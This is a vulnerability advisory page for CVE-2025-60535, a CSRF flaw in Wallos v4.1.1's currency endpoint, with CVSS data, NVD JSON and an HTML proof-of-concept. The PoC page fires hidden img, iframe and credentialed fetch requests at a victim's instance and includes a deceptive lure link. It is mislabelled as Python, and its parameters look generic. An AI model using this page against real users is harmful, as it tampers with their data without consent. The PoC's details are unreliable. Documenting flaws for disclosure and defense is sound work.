Security Vulnerability Report
中文
CVE-2025-60535 CVSS 7.3 HIGH

CVE-2025-60535

Published: 2025-10-14 17:16:14
Last Modified: 2026-04-15 00:35:42

Description

A Cross-Site Request Forgery (CSRF) in the component /endpoints/currency/currency of Wallos v4.1.1 allows attackers to execute arbitrary operations via a crafted GET request.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Wallos < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60535 PoC: CSRF via crafted GET request to /endpoints/currency/currency --> <!-- Save as HTML and host on attacker's server, then trick victim into visiting --> <!DOCTYPE html> <html> <head> <title>CVE-2025-60535 - Wallos CSRF PoC</title> </head> <body> <h1>CSRF Proof of Concept for Wallos v4.1.1</h1> <!-- Method 1: Using an img tag to trigger the GET request automatically --> <img src="http://target-wallos-instance/endpoints/currency/currency?currency=USD&action=update" style="display:none;" alt=""> <!-- Method 2: Using a hidden iframe --> <iframe src="http://target-wallos-instance/endpoints/currency/currency?currency=EUR&action=change" style="display:none;"></iframe> <!-- Method 3: Using JavaScript fetch (may be blocked by CORS but request is still sent) --> <script> // Automatically trigger the CSRF request when page loads fetch('http://target-wallos-instance/endpoints/currency/currency?currency=GBP&action=modify', { method: 'GET', credentials: 'include' }); </script> <!-- Method 4: Using a clickable link to manually trigger --> <a href="http://target-wallos-instance/endpoints/currency/currency?currency=JPY&action=delete" target="_blank"> Click here for a surprise </a> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60535", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:14.203", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) in the component /endpoints/currency/currency of Wallos v4.1.1 allows attackers to execute arbitrary operations via a crafted GET request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "http://wallos.com", "source": "[email protected]"}, {"url": "https://github.com/ellite/Wallos/", "source": "[email protected]"}, {"url": "https://github.com/vityuasd/VulList/blob/main/CVE-2025-60535.md", "source": "[email protected]"}]}}